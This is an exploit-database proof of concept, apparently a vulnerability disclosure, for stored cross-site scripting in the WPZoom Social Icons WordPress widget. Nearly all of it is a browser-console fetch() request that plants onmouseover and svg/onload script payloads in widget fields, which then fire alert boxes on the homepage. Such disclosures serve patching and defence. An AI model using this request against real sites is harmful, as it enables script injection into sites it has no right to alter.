## https://sploitus.com/exploit?id=WPEX-ID:B8661FBE-78B9-4D29-90BF-5B68AF468EB6
1. As an administrator, visit /wp-admin/widgets.php and add a Social Icons from WPZoom Widget
2. Open your browser's console, and paste the following command:
await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": `widget-zoom-social-icons-widget%5B2%5D%5Btitle%5D=Follow+us&widget-zoom-social-icons-widget%5B2%5D%5Bdescription%5D=asdasd&widget-zoom-social-icons-widget%5B2%5D%5Bopen_new_tab%5D=true&widget-zoom-social-icons-widget%5B2%5D%5Bicon_alignment%5D=none&widget-zoom-social-icons-widget%5B2%5D%5Bicon_style%5D=with-canvas&widget-zoom-social-icons-widget%5B2%5D%5Bicon_canvas_style%5D=round&widget-zoom-social-icons-widget%5B2%5D%5Bicon_padding_size%5D=8&widget-zoom-social-icons-widget%5B2%5D%5Bicon_font_size%5D=18&widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker%5D=%231e73be&widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker_hover%5D=%231e73be&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Ffacebook.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Facebook&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=123%22%20onmouseover=%27alert(/XSS/)%27&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%230866FF&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=facebook&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=%27%20%3e%3csvg/onload=alert(123)//%3e&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Fx.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=X&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=x&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Finstagram.com%2F&widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Instagram&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=instagram&widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-id=zoom-social-icons-widget-2&id_base=zoom-social-icons-widget&widget-width=250&widget-height=200&widget_number=-1&multi_number=2&add_new=&action=save-widget&savewidgets=${_wpnonce_widgets.value}&sidebar=sidebar-1`,
"method": "POST",
"mode": "cors"
});
3. Visit the site's homepage, and notice our test alert boxes are executing.